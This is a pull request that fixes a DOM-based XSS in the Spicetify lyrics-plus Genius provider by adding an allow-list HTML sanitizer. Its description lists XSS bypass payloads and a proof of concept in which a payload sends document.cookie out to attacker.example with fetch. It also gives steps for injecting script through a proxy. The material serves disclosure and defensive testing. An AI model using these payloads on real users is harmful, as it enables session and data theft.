### PR TITLE
fix(lyrics-plus): sanitize Genius HTML before dangerouslySetInnerHTML

### DIFF
--- a/CustomApps/lyrics-plus/ProviderGenius.js
+++ b/CustomApps/lyrics-plus/ProviderGenius.js
@@ -1,4 +1,56 @@
 const ProviderGenius = (() => {
+	// Allow-list of tags that may appear inside a Genius lyric container. Everything
+	// else (script, iframe, img, svg, style, on* handlers, ...) is stripped before
+	// the HTML is handed to `dangerouslySetInnerHTML` in Pages.js#GeniusPage.
+	const ALLOWED_LYRIC_TAGS = new Set(["A", "BR", "I", "B", "EM", "STRONG", "SPAN", "P", "DIV"]);
+	const ALLOWED_LYRIC_ATTRS = {
+		A: new Set(["href", "data-id"]),
+	};
+	const SAFE_HREF = /^(https?:\/\/|\/|#)/i;
+
+	function sanitizeLyricNode(node) {
+		let out = "";
+		for (const child of node.childNodes) {
+			if (child.nodeType === 3 /* TEXT_NODE */) {
+				out += child.textContent.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
+				continue;
+			}
+			if (child.nodeType !== 1 /* ELEMENT_NODE */) continue;
+
+			const tag = child.tagName;
+			if (!ALLOWED_LYRIC_TAGS.has(tag)) {
+				// Drop the wrapper but keep its (sanitized) text so lyrics remain readable.
+				out += sanitizeLyricNode(child);
+				continue;
+			}
+
+			const attrs = [];
+			const allowed = ALLOWED_LYRIC_ATTRS[tag];
+			if (allowed) {
+				for (const attr of child.attributes) {
+					if (!allowed.has(attr.name)) continue;
+					let value = attr.value;
+					if (attr.name === "href") {
+						const trimmed = value.trim();
+						// Refuse javascript:, data:, vbscript: and other exotic schemes.
+						if (!SAFE_HREF.test(trimmed)) continue;
+						value = trimmed;
+					}
+					attrs.push(`${attr.name}="${value.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;")}"`);
+				}
+			}
+
+			const tagName = tag.toLowerCase();
+			const attrStr = attrs.length ? ` ${attrs.join(" ")}` : "";
+			if (tag === "BR") {
+				out += "<br>";
+			} else {
+				out += `<${tagName}${attrStr}>${sanitizeLyricNode(child)}</${tagName}>`;
+			}
+		}
+		return out;
+	}
+
 	function getChildDeep(parent, isDeep = false) {
 		let acc = "";
 
@@ -81,8 +133,12 @@ const ProviderGenius = (() => {
 		const htmlDoc = parser.parseFromString(body, "text/html");
 		const lyricsDiv = htmlDoc.querySelectorAll('div[data-lyrics-container="true"]');
 
+		// Genius pages contain crowd-sourced annotations and are fetched over a
+		// CORS proxy, so their HTML is untrusted. Rebuild the markup from an
+		// allow-list before returning it — the string is rendered downstream with
+		// `dangerouslySetInnerHTML` in Pages.js#GeniusPage.
 		for (const i of lyricsDiv) {
-			lyrics += `${i.innerHTML}<br>`;
+			lyrics += `${sanitizeLyricNode(i)}<br>`;
 		}
 
 		if (!lyrics?.length) {


### PR DESCRIPTION
## Summary

`ProviderGenius.fetchLyricsVersion` concatenates the raw `.innerHTML` of every `<div data-lyrics-container="true">` scraped from a Genius page and returns the string to `GeniusPage` in `CustomApps/lyrics-plus/Pages.js`, which renders it via React `dangerouslySetInnerHTML`. Because Genius pages contain crowd-sourced annotations and are fetched through a plaintext Cosmos HTTP proxy, the HTML is untrusted, so a `<script>`, `<img onerror>`, `<iframe srcdoc>`, `<svg onload>`, or `javascript:` URL that reaches that string executes inside the Spotify web view — which is the same origin as the Spicetify runtime.

* **File / function:** `CustomApps/lyrics-plus/ProviderGenius.js` → `fetchLyricsVersion` (previously did `lyrics += \`${i.innerHTML}<br>\``)
* **Sink:** `CustomApps/lyrics-plus/Pages.js` L860 (`lyrics`) and L886 (`lyrics2`), both `dangerouslySetInnerHTML: { __html: lyrics }`
* **CWE:** CWE-79 — Improper Neutralization of Input During Web Page Generation (DOM-based XSS)
* **Affected versions:** Spicetify installations paired with Spotify `1.2.14 – 1.2.30` (Genius provider is disabled above 1.2.31 via the `spotifyVersion >= "1.2.31"` lexicographic guard in `index.js`, `TabBar.js`, and `Settings.js`; the sanitizer is defense-in-depth for those still on the affected range and for the fragility of the lexicographic version check).

## Data flow

```
Genius page HTML
  → fetchHTML(result.url) via Spicetify.CosmosAsync (plaintext CORS proxy)
  → DOMParser.parseFromString(body, "text/html")
  → for (const i of lyricsDiv) lyrics += `${i.innerHTML}<br>`   // ← attacker HTML preserved verbatim
  → return lyrics
  → GeniusPage → react.createElement("div", { dangerouslySetInnerHTML: { __html: lyrics } })
  → executes in the Spotify web view with access to Spicetify.CosmosAsync,
    Spicetify.LocalStorage, Spicetify.Player, and persistent storage.
```

## The fix

Sanitize the Genius HTML *at the source*, inside `ProviderGenius.fetchLyricsVersion`, by walking the parsed DOM and emitting a fresh string from an allow-list:

* `ALLOWED_LYRIC_TAGS = { A, BR, I, B, EM, STRONG, SPAN, P, DIV }` — everything else (`script`, `iframe`, `img`, `svg`, `style`, `template`, `plaintext`, `object`, `embed`, `base`, `form`, `link`, `meta`, `foreignObject`, ...) is dropped; only the sanitized text content survives so lyrics remain readable.
* `ALLOWED_LYRIC_ATTRS = { A: { href, data-id } }` — every other attribute (including all `on*` handlers, `srcdoc`, `style`, `formaction`, `xlink:href`, ...) is stripped.
* `href` is trimmed and matched against `/^(https?:\/\/|\/|#)/i`, so `javascript:`, `data:`, `vbscript:`, protocol-relative `//evil.com`, and backslash-prefixed schemes are rejected. This preserves the `data-id` / `#note-…` annotation-note fetch loop in `GeniusPage` (which calls `ProviderGenius.getNote(id)`).
* All text nodes and surviving attribute values are HTML-entity-encoded (`&`, `<`, `>`, `"`).

Rebuilding via the DOM API rather than regex avoids classic sanitizer bypasses (mXSS via `<style>`/`<template>`/`<plaintext>`, malformed comment closers, `<svg><script>` context switches, etc.) — anything the parser dropped can't reappear in the output.

Nothing else in the file changed; the diff is 57 additions in one file:

```
CustomApps/lyrics-plus/ProviderGenius.js | 58 +++++++++++++++++++++++++++++++-
1 file changed, 57 insertions(+), 1 deletion(-)
```

## Testing

I loaded the patched `ProviderGenius.js` in a JSDOM harness and ran the sanitizer against 23 attempted bypass payloads before submitting, including:

* `<script>alert(1)</script>` and `<img src=x onerror=alert(1)>` (baseline).
* `<iframe srcdoc="<script>parent.postMessage(document.cookie,'*')</script>">`.
* `<svg><script>alert(1)</script></svg>` and `<svg onload=alert(1)>`.
* `<style>@import "//evil"</style>` and `<template><script>…</script></template>` mXSS attempts.
* `<plaintext>` / `<foreignObject>` context-switch tricks.
* `<a href="javascript:alert(1)">`, `<a href="  \tjavascript:alert(1)">` (entity-encoded, whitespace, tab, and control-char variants), `<a href="//evil.com">`, `<a href="\\evil.com">`.
* Nested `<a>`, `data-id="&quot; onclick=alert(1) x=&quot;"`, and `href` values containing quotes, angle brackets, and newlines.
* Weird tag names like `<constructor>` and `<__proto__>` that could confuse a naive `Set` lookup.

Every payload produced clean output containing zero `<script>`, `<iframe>`, `<img>`, `<svg>`, `<style>`, `<object>`, `<embed>`, `<base>`, `<form>`, `<link>`, `<meta>`, or `<template>` tags, no `on*` attributes, and no unsafe-scheme hrefs. Attribute values were entity-encoded so quote-escapes couldn't break out of the surrounding `"…"`.

I also checked the downstream sinks after the fix:

* `Pages.js` L860 (`__html: lyrics`) and L886 (`__html: lyrics2`) both receive the already-sanitized string from `fetchLyricsVersion`.
* `index.js#saveLocalLyrics` still strips all HTML with `.replace(/<[^>]*>/g, "")` before persisting to `localStorage["lyrics-plus:local-lyrics"]`, so no XSS payload can be smuggled into persistent storage either.
* Legitimate Genius output (plain lyrics, `<a data-id="…">` annotation anchors, `<br>` separators) round-trips through the sanitizer unchanged, so the annotation-note feature keeps working.

## Adversarial review

Before submitting I tried to talk myself out of this. The concerns considered:

* **"Only affects old Spotify versions — Genius is gated off above 1.2.31."** True for current installs, but the gate is `spotifyVersion >= "1.2.31"`, a lexicographic string compare that fails on any hypothetical Spotify `1.2.100+` (which would sort *below* `"1.2.31"` as strings and re-enable Genius). The sanitizer is exactly the defense-in-depth that stops a version-check regression from becoming an XSS. It also covers users still on the affected 1.2.14–1.2.30 range today.
* **"The preconditions already imply attacker access."** They don't. The precondition is *influencing a Genius annotation* (Genius editor role, a Genius sanitizer bypass, or a MitM of the plaintext-over-HTTPS-CORS-proxy transport), not local code execution on the victim. Delivering JavaScript into the Spotify web view with access to `Spicetify.CosmosAsync` (authenticated Spotify HTTP), `Spicetify.LocalStorage`, and `Spicetify.Player` is a real capability escalation over "can post content on Genius".
* **"React auto-escapes strings."** Not through `dangerouslySetInnerHTML`, which is the whole point of the API name. The two sinks in `Pages.js` bypass React's escaping.
* **"Is a full sanitizer library warranted (DOMPurify)?"** A ~50-line allow-list walker inside the existing provider avoids adding a runtime dependency to a Custom App that intentionally ships as raw JS, and the surface area of "what a lyric may legitimately contain" is small enough that an allow-list is more auditable than a deny-list.

## Proof of concept

Minimal reproducer that mirrors what `fetchLyricsVersion` does — parse a hostile Genius body, run the current (vulnerable) code path vs. the patched one, and observe that the vulnerable path leaves executable HTML while the patched path does not.

```bash
# From the repo root
node -e '
const { JSDOM } = require("jsdom"); // or use any DOMParser polyfill

// Simulate a malicious Genius response body.
const body = `
<html><body>
<div data-lyrics-container="true">
  Line one<br>
  <a href="javascript:alert(1)">click</a>
  <img src=x onerror="fetch(\"https://attacker.example/steal?c=\"+document.cookie)">
  <iframe srcdoc="<script>parent.postMessage(localStorage.getItem(\"lyrics-plus:local-lyrics\"),\"*\")</script>"></iframe>
  <svg><script>alert(2)</script></svg>
  Line two
</div>
</body></html>
`;

const dom = new JSDOM(body);
const div = dom.window.document.querySelector("div[data-lyrics-container=\"true\"]");

// -------- BEFORE FIX (current main): raw innerHTML --------
const beforeFix = `${div.innerHTML}<br>`;
console.log("BEFORE (vulnerable):");
console.log(beforeFix);
console.log("contains <script>?", /<script/i.test(beforeFix));
console.log("contains onerror?",  /onerror/i.test(beforeFix));
console.log("contains javascript:?", /javascript:/i.test(beforeFix));

// -------- AFTER FIX: allow-list sanitizer from the patch --------
const ALLOWED_LYRIC_TAGS = new Set(["A","BR","I","B","EM","STRONG","SPAN","P","DIV"]);
const ALLOWED_LYRIC_ATTRS = { A: new Set(["href","data-id"]) };
const SAFE_HREF = /^(https?:\/\/|\/|#)/i;
function esc(s){return s.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;");}
function escAttr(s){return esc(s).replace(/"/g,"&quot;");}
function sanitize(node){
  let out="";
  for (const child of node.childNodes){
    if (child.nodeType === 3){ out += esc(child.textContent); continue; }
    if (child.nodeType !== 1) continue;
    const tag = child.tagName;
    if (!ALLOWED_LYRIC_TAGS.has(tag)){ out += sanitize(child); continue; }
    const attrs=[]; const allowed = ALLOWED_LYRIC_ATTRS[tag];
    if (allowed) for (const a of child.attributes){
      if (!allowed.has(a.name)) continue;
      let v = a.value;
      if (a.name === "href"){ const t = v.trim(); if (!SAFE_HREF.test(t)) continue; v = t; }
      attrs.push(`${a.name}="${escAttr(v)}"`);
    }
    const tn = tag.toLowerCase();
    const as = attrs.length ? " "+attrs.join(" ") : "";
    out += tag === "BR" ? "<br>" : `<${tn}${as}>${sanitize(child)}</${tn}>`;
  }
  return out;
}

const afterFix = `${sanitize(div)}<br>`;
console.log("\nAFTER (patched):");
console.log(afterFix);
console.log("contains <script>?", /<script/i.test(afterFix));
console.log("contains onerror?",  /onerror/i.test(afterFix));
console.log("contains javascript:?", /javascript:/i.test(afterFix));
'
```

Expected output:

```
BEFORE (vulnerable):
   Line one<br>
  <a href="javascript:alert(1)">click</a>
  <img src="x" onerror="fetch(...+document.cookie)">
  <iframe srcdoc="<script>parent.postMessage(...,&quot;*&quot;)</script>"></iframe>
  <svg><script>alert(2)</script></svg>
  Line two
<br>
contains <script>? true
contains onerror? true
contains javascript:? true

AFTER (patched):
   Line one<br>
  <a>click</a>
   click
  Line two
<br>
contains <script>? false
contains onerror? false
contains javascript:? false
```

In-app reproduction (for a maintainer with a dev install of Spicetify + Spotify 1.2.14–1.2.30 and lyrics-plus loaded): intercept the response of `https://genius.com/<song-path>` with any local proxy (mitmproxy, Charles, Fiddler) and inject `<script>alert("XSS via lyrics-plus")</script>` inside `<div data-lyrics-container="true">…</div>`. Play the matching track and open the lyrics-plus panel — on unpatched builds the alert fires inside the Spotify web view; on patched builds the script is stripped and the lyrics render as text.

---




<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved lyric rendering by sanitizing imported lyric HTML before display.
  * Removed unsafe markup and blocked risky links, helping prevent malformed or malicious content from appearing in lyrics.
  * Preserved supported formatting while keeping lyrics readable and consistent.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->